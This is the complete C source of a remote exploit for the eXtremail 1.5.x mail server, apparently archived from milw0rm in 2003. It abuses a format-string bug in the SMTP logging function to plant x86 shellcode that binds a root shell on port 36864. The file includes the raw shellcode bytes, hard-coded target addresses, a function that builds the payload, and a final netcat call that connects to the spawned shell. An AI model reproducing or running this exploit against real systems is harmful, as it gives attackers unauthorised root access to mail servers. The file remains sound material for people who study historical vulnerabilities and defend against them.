/****************************************************************/
/* Linux eXtremail 1.5.x Remote Format Strings Exploit */
/* */
/* */
/* By B-r00t - 02/07/2003 */
/* */
/* Versions: Linux eXtremail-1.5-8 => VULNERABLE */
/* Linux eXtremail-1.5-5 => VULNERABLE */
/* Exploit uses format strings bug in fLog() of smtpd to bind a */
/* r00tshell to port 36864 on the target eXtremail server. */
/* */
/****************************************************************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define EXPLOIT "eXtreme"
#define DEST_PORT 25
// Prototypes
int get_sock (char *host);
int send_sock (char *stuff);
int read_sock (void);
void usage (void);
int do_it (void);
// Globals
int socketfd, choice;
unsigned long GOT, RET;
char *myip;
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";
struct {
char *systemtype;
unsigned long got;
unsigned long ret;
int pad;
int buf;
int pos;
} targets[] = {
// Confirmed targets tested by B-r00t.
{ "RedHat 7.2 eXtremail V1.5 release 5
(eXtremail-1.5-5.i686.rpm)", 0x0813b19c, 0xbefff1e8, 1, 266, 44},
{ "Linux ANY eXtremail V1.5 release 5
(eXtremail-1.5-5.tar.gz)", 0x0813b19c, 0xbefff1b8, 1, 266, 44},
{ "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)", 0xbefff0c8,
0xbefff1d4, 1, 266, 44},
{ "eXtremail V1.5 DEBUG", 0x44434241, 0xaaaaaaaa, 1, 266,
44},
{ 0 }
};
int main ( int argc, char *argv[] )
{
char *TARGET = "TARGET";
printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n",
EXPLOIT);
if (argc < 3)
usage ();
choice = atoi(argv[2]);
if (choice < 0 || choice > 3)
usage ();
setenv (TARGET, argv[1], 1);
get_sock(argv[1]);
sleep (1);
read_sock ();
sleep (1);
send_sock (helo);
sleep (1);
read_sock ();
sleep(1);
do_it ();
}
void usage (void)
{
int loop;
printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
for (loop = 0; targets[loop].systemtype; loop++)
printf ("\n%d\t%s", loop, targets[loop].systemtype);
printf ("\n\nOn success a r00tshell will be spawned on port
36864.\n\n");
exit (-1);
}
int get_sock (char *host)
{
struct sockaddr_in dest_addr;
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("Socket Error!\n");
exit (-1);
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(host, &(dest_addr.sin_addr))) {
perror("inet_aton problems\n");
exit (-2);
}
memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct
sockaddr)) == -1){
perror("Connect failed!\n");
close (socketfd);
exit (-3);
}
printf ("\n\nConnected to %s\n", host);
}
int send_sock (char *stuff)
{
int bytes;
bytes = (send (socketfd, stuff, strlen(stuff), 0));
if (bytes == -1) {
perror("Send error");
close (socketfd);
exit(4);
}
printf ("Send:\t%s", stuff);
return bytes;
}
int read_sock (void)
{
int bytes;
char buffer[200];
char *ptr;
ptr = buffer;
memset (buffer, '\0', sizeof(buffer));
bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
if (bytes == -1) {
perror("send error");
close (socketfd);
exit(4);
}
printf ("Recv:\t%s", buffer);
return bytes;
}
int do_it (void)
{
char format[200], buf[500], *bufptr, *p;
int loop, sofar = 0;
int PAD = targets[choice].pad;
int POS = targets[choice].pos;
unsigned char r[3], g[3], w[3];
RET = targets[choice].ret;
r[0] = (int) (RET & 0x000000ff);
r[1] = (int)((RET & 0x0000ff00) >> 8);
r[2] = (int)((RET & 0x00ff0000) >> 16);
r[3] = (int)((RET & 0xff000000) >> 24);
GOT = targets[choice].got;
g[0] = (int) (GOT & 0x000000ff);
g[1] = (int)((GOT & 0x0000ff00) >> 8);
g[2] = (int)((GOT & 0x00ff0000) >> 16);
g[3] = (int)((GOT & 0xff000000) >> 24);
// Start buf
bufptr = buf;
bzero (bufptr, sizeof(buf));
strncpy (buf, "mail from: ", strlen("mail from: "));
sofar = 19;
// Do padding
for (loop=0; loop<PAD; loop++)
strncat (buf, "a", 1);
sofar = sofar+PAD;
//1st GOT addy
strncat (buf, g, 4);
//2nd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
// 3rd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
// 4th GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
sofar = sofar+16;
for (loop=0; loop<4; loop++) {
if (r[loop] > sofar) {
w[loop] = r[loop]-sofar;
} else
if (r[loop] == sofar) {
w[loop] = 0;
}else
if (r[loop] < sofar) {
w[loop] = (256-sofar)+r[loop];
}
sofar = sofar+w[loop];
}
bufptr = format;
bzero (bufptr, sizeof(format));
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",
w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
strncat (buf, format, sizeof(format));
strncat (buf, shellcode, sizeof(shellcode));
// Summarise
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
printf ("\nWrite Addy:\t\t0x%x", GOT);
printf ("\nRET (shellcode):\t0x%x", RET);
printf ("\nPAD (alignment):\t%d", PAD);
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf),
targets[choice].buf);
printf ("\nSending it ... \n");
sleep(1);
// Ok lets Wack it!
send_sock (buf);
sleep (1);
close (socketfd);
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864
....!!!!!\n\n\n");
sleep(3); // May take time to spawn a shell
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
}
// milw0rm.com [2003-07-02]